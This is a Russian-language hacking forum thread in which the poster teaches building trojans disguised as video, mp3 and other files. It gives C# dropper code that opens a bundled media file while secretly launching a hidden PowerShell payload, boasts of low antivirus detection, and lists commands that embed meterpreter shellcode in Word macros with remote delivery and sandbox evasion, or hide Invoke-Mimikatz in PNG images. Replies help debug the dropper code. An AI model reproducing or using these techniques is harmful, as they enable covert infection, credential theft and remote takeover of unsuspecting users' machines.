[В паблик из RED TEAM] Заражаем [ video,mp3,gif,doc ] detect 5-10%

[Ondrik8]

Всем привет, решил здесь оставить свой след в ветке, касаемо нашей любимой темы, пусть останется в веках!))
Заражать мы будем самые распространенные файлы которыми пользуется каждый, так же решил, я еще и доказать Вам свою проф пригодность)
да и думаю не хер в себе все держать! Нужно делится своими находками и наработками! Чего и Вам желаю..

одно подозрительное слово "находками" Да признаюсь сразу эту технику я честно.... спиздил, но при минимальном знании программирования и работай с visual-studio
ее можно настроить под себя)

Итак начнем, с заражения видео файла. Нам по требуется visual-studio 2017 с языком С#, Empire or Metasploit. Я лично буду юзать империю.

Генерим в империи батник, предварительно настроив listener : usestager | windows/launcher_bat убираем лишнее, берем нужное как показано ниже!

Ссылка скрыта от гостей

эту сборочку открываем в студии и ..

как видите редачим, файл Program.cs и вставляем в 21(очко)) строчку свою строчку сгенеренную в империи)

Детект только один из 40 палит только касперыч(
​

все просто до "не могу" И не дай мне Бог увидеть эти методики на каких нить РУ-бордах так как я знаю что в РУ-зоне впервые они описываются!) и как этот видео проект создавался Вы поймете ниже на примере создания mp3-virus

Заражаем mp3

Создаем проект как показано выше. Удаляем стандартное заполнение и вставляем свое:

using System;
using System.IO;
using System.Diagnostics;

namespace Namespace
{
    class Program
    {
        static void Main()
        {
            // Copiar el vídeo a un archivo temporal y abrirlo
            byte[] archivo = Properties.Resources.NombreArchivo;
            string destino = Environment.ExpandEnvironmentVariables(@"%tmp%\nombre_archivo.extension");
            File.WriteAllBytes(destino, archivo);
            Process procesoArchivo = Process.Start(destino);

            // Ejecutar launcher
            ProcessStartInfo launcherProcess = new ProcessStartInfo();
            // C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            launcherProcess.FileName =  Environment.ExpandEnvironmentVariables(@"%windir%\System32\WindowsPowerShell\v1.0\powershell.exe");
            launcherProcess.Arguments = "-Command Add-Type -AssemblyName 'System.Windows.Forms'; [Windows.Forms.Messagebox]::Show('Hacked')";
            launcherProcess.WindowStyle = ProcessWindowStyle.Hidden;
            Process.Start(launcherProcess);

            // Esperar a que cierren el vídeo/imagen/pdf, lo que sea
            procesoArchivo.WaitForExit();
            // Eliminar nuestro vídeo
            while (File.Exists(destino))
            {
                try
                {
                    File.Delete(destino);
                }
                catch {}
            }
        }
    }
}

[обратите внимание на 25 строку в коде] Уже уловили суть? хех..
Самое главное видео показывает и музыка играет, а к Вам прилетает заветная сессия!)​

переименовываем 5 строчку

в свойствах ConsoleApp1 добавляем mp3 ресурс

назовем его codeby.mp3

далее изменяем эти строки:

ну и "грузим" своей нагрузкой в нашу 21 строку

coздаем иконку зайдя на этот онлайн

Ссылка скрыта от гостей

эту .ico грузим к себе в ресурсы нашей злой эмпэтри - прожки ))

и собираем наше творение...

с GIF-ками и PDF-ками я думаю справитесь....


теперь макрос-ы "Эх! Говорит и показывает Рассея" Шариков П.П

слышали про Invoke лютого криптовщика PowerShell так вот создали продукт на основе его трудов.

PowerShellScripts​

Свежачок, для красной братвы!)


Шеллкод, встроенный в тело документа MS-Word, без обфускации, без уклонения от песочницы:

C:\PS> Invoke-MacroCreator -i meterpreter_shellcode.raw -t shellcode -d body

Шеллкод передается по скрытому каналу WebDAV с обфускацией, без уклонения от песочницы:

C:\PS> Invoke-MacroCreator -i meterpreter_shellcode.raw -t shellcode -url webdavserver.com -d webdav -o

Сценарий доставлен по библиографическому источнику скрытого канала, с обфускацией, с уклонением песочницы:

C:\PS> Invoke-MacroCreator -i regsvr32.sct -t file -url 'http://my.server.com/sources.xml' -d biblio -c 'regsvr32 /u /n /s /i:regsvr32.sct scrobj.dll' -o -e

Исполняемый файл передается через скрытый канал WebDAV, используя UNC, без обфускации, с уклонением от песочницы, используя метод выполнения 3:

C:\PS> Invoke-MacroCreator -i badass.exe -p file -t webdav -c 'badass.exe' -e -m 3

Командная строка, встроенная в тело документа MS-Word, с обфускацией, без уклонения от песочницы, с использованием метода выполнения 1:

C:\PS> Invoke-MacroCreator -i my_cmd.bat -p cmd -t body -o -m 1

Шеллкод, встроенный в комментарий документа MS-Word, не обфускация, отсутствие уклонения от песочницы, добавление функций автоматического открытия:

C:\PS> Invoke-MacroCreator -i meterpreter_shellcode.raw -t shellcode -d comment -a

Шеллкод, поставляемый по скрытому каналу доставки DNS с использованием домена «mydomain.com», с обфускацией, без уклонения от песочницы:

C:\PS> Invoke-MacroCreator -i meterpreter_shellcode.raw -t shellcode -d dns -dn mydomain.com -o

Функционал как видите впечатляет, но я пока не тестил и пожалуйста как будете собирать макросы по делитесь здесь буду благодарен очень, честно... Да и другим тоже будет полезно это увидеть)


Спасибо за внимание, с вами был на веки Ваш Ondrik8)

 

[Сергей Попов]

Отличный пример классной статьи! С почином в красной ветке

 

[SooLFaa]

Круто

 

[Ondrik8]

Две новости и все хорошие!)

Новый mimikatz

Бля, понять не могу что у них за логотип?) У этих епнутых англичан...

ии.... гвоздь сегодняшнего дня! та-дааам... Заражаем через )) PNG то есть в картинке в пикселях "полезная" нагрузка (PAYLOAD) нам же стоит только закинуть считыватель этого трояна, который в свою очередь считывает код с картинки и откроет нам?
правильно,) "задний проход" через который мы с успехом и залезем!) Фу бля( пишу и дурная картинка перед глазами встала...

изображение 1920x1200​

-Script [путь к файлу ] Путь к скрипту для вставки в изображение.

-Image [filepath] Изображение для встраивания скрипта в.

-Out [filepath] Файл для сохранения полученного изображения (изображение будет PNG)

-Web Выведите команду для чтения изображения из Интернета вместо чтения из файла. Вам нужно будет разместить изображение и вставить URL-адрес в команду.


Создаём картинку со "сценарием" «Invoke-Mimikatz.ps1», встроенным в него, и выведите oneliner для выполнения с диска, то есть офлайн или в локалке, методика так себе, не очень..

PS>Import-Module .\Invoke-PSImage.ps1

PS>Invoke-PSImage -Script .\Invoke-Mimikatz.ps1 -Image .\kiwi.jpg -Out .\evil-kiwi.png
   [Oneliner to execute from a file]

Создаём картинку с вложенным в него "сценарием" «Invoke-Mimikatz.ps1» и выведите oneliner для выполнения из интернета, то есть вешаем на хост) и пусть висит с пикселями волшебными..

PS>Import-Module .\Invoke-PSImage.ps1
PS>Invoke-PSImage -Script .\Invoke-Mimikatz.ps1 -Image .\kiwi.jpg -Out .\evil-kiwi.png -Web
   [Oneliner to execute from the web]

Invoke-PSImage

Удачи!

 

[kot-gor]

Всем добрый вечер.. если рассматривать mp3,при компиляции появляются ошибки.Не пойму где ложанулся, вроде делаю всё правильно.Одрик не подскажешь в чем может быть проблема? И еще один вопрос вывод файла будет в расширении exe?

 

[mrOkey]

Всем добрый вечер.. если рассматривать mp3,при компиляции появляются ошибки.Не пойму где ложанулся, вроде делаю всё правильно.Одрик не подскажешь в чем может быть проблема? И еще один вопрос вывод файла будет в расширении exe?

попробуй явно namespace указать

ConsoleApp4.Properties.Resources.codeby

 

[OneDollar]

Всем добрый вечер.. если рассматривать mp3,при компиляции появляются ошибки.Не пойму где ложанулся, вроде делаю всё правильно.Одрик не подскажешь в чем может быть проблема? И еще один вопрос вывод файла будет в расширении exe?

Будет в ехе)

 

[jonni_vu]

Всем добрый вечер.. если рассматривать mp3,при компиляции появляются ошибки.Не пойму где ложанулся, вроде делаю всё правильно.Одрик не подскажешь в чем может быть проблема? И еще один вопрос вывод файла будет в расширении exe?

такая же проблема. пробывал и namespase перед Properties выставлять , ошибка не уходит.

 

[jonni_vu]

Разобрался))

 

[Сергей Попов]

Разобрался))

Подробнее пожалуйста.

 

[WildMilk]

Разобрался))

Что сделал? Делись

 

[jonni_vu]

byte[] archivo = pesna.Properties.Resources.pesna1;
            string destino = Environment.ExpandEnvironmentVariables(@"%tmp%\pesna.mp3");
            File.WriteAllBytes(destino, archivo);
            Process procesoArchivo = Process.Start(destino);

Имя вставляемого Resources должно отличаться от Имени сборки. тогда ошибки нет